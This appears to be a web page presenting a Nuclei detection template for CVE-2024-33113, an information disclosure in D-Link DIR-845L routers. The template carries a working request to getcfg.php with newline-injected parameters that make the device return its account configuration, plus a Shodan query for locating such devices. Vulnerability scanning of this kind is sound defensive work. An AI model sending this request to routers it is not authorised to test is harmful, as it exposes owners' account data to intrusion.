D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure
ID: CVE-2024-33113
Severity: medium
Author: pussycat0x
Tags: cve,cve2024,dlink,info-leak
Description
D-LINK DIR-845L <=v1.01KRb03 is vulnerable to information disclosure via bsc_sms_inbox.php.
YAML Source
id: CVE-2024-33113

info:
  name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
  reference:
    - https://github.com/FaLLenSKiLL1/CVE-2024-33113
    - https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md
  classification:
    epss-score: 0.00043
    epss-percentile: 0.0866
    cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: "DIR-845L"
    product: dir-845l
    vendor: dlink
  tags: cve,cve2024,dlink,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<service>DEVICE.ACCOUNT</service>"
          - "<seqno>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fb1ef020a9c458f3e3749669689433c5179639b08e2b6f9fa4a34b6a35ae3ff00221008a61eb3fe75d65c6c9ab022765b335cc8c40b26a2847125b6523fdc706387ec9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-33113.yaml"